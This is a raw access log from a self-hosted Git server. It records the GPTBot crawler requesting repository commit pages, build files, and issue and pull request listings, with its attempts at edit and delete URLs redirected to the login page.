"/windpacer/windpacer/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fxref-PostgresWatchdog.html" [Client 74.7.227.38] [Length 18192] [Gzip 3.28] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/build/PostgresWatchdog/xref-PostgresWatchdog.html" +[17/Feb/2026:19:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2f.cmake%2fapi%2fv1%2fquery%2fclient-vscode%2fquery.json" [Client 74.7.227.38] [Length 24939] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:49:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14334] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14336] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:49:42 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14335] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14334] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:49:43 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14339] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=rendered" [Client 74.7.227.38] [Length 11143] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:49:44 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14332] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" [Client 74.7.227.38] [Length 1037] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/base_library.zip" +[17/Feb/2026:19:49:45 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10153] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/dcsintegration.png?auto=format&fit=crop&q=80&w=1000" [Client 74.7.227.38] [Length 533814] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/index.html" +[17/Feb/2026:19:49:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 31862] [Gzip 12.95] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" +[17/Feb/2026:19:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&milestone=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10156] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&milestone=-1&state=all&type=all" +[17/Feb/2026:19:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=nearduedate&state=all&type=all" [Client 74.7.227.38] [Length 9963] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:49:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&project=-1&sort=leastupdate&state=all&type=all" [Client 74.7.227.38] [Length 9998] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:49:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fbuild%2fPostgresWatchdog%2fPostgresWatchdog.pkg" [Client 74.7.227.38] [Length 17032] [Gzip 3.16] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/build/PostgresWatchdog/PostgresWatchdog.pkg" +[17/Feb/2026:19:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=mostcomment&state=all&type=all" [Client 74.7.227.38] [Length 10168] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=all&type=all" +[17/Feb/2026:19:49:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10196] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:49:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js?display=rendered" [Client 74.7.227.38] [Length 11198] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/assets/js/i18n.js" +[17/Feb/2026:19:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md?display=source" [Client 74.7.227.38] [Length 36414] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/Project%20Planning-1.md" +[17/Feb/2026:19:49:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2f.cmake%2fapi%2fv1%2fquery%2fclient-vscode%2fquery.json" [Client 74.7.227.38] [Length 24929] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/industrial-comm/build/.cmake/api/v1/query/client-vscode/query.json" +[17/Feb/2026:19:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 14282] [Gzip 8.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:49:53 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:49:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:49:54 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:49:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 1035] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 39905] [Gzip 25.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:49:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 48601] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:49:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 9854] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:49:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 25093] [Gzip 19.92] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json?display=source" [Client 74.7.227.38] [Length 14333] [Gzip 5.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/.cmake/api/v1/reply/index-2026-01-04T14-02-47-0329.json" +[17/Feb/2026:19:49:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&sort=mostcomment&state=open&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:49:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:49:59 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:49:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/PKG-00.toc" +[17/Feb/2026:19:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10185] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:50:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11625] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:50:01 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:50:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/Analysis-00.toc" +[17/Feb/2026:19:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?labels=0&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?labels=0&milestone=-1&state=all&type=all" +[17/Feb/2026:19:50:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?labels=0&project=-1&sort=latest&state=open&type=all" [Client 74.7.227.38] [Length 10191] [Gzip 3.47] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?labels=0&project=-1&state=open&type=all" +[17/Feb/2026:19:50:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:50:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:50:03 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4847] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/PYZ-00.toc" +[17/Feb/2026:19:50:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=1&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9975] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=1&project=-1&state=all&type=all" +[17/Feb/2026:19:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11627] [Gzip 3.34] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json?display=source" [Client 74.7.227.38] [Length 11597] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/.cmake/api/v1/reply/directory-.-f5ebdc15457944623624.json" +[17/Feb/2026:19:50:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr 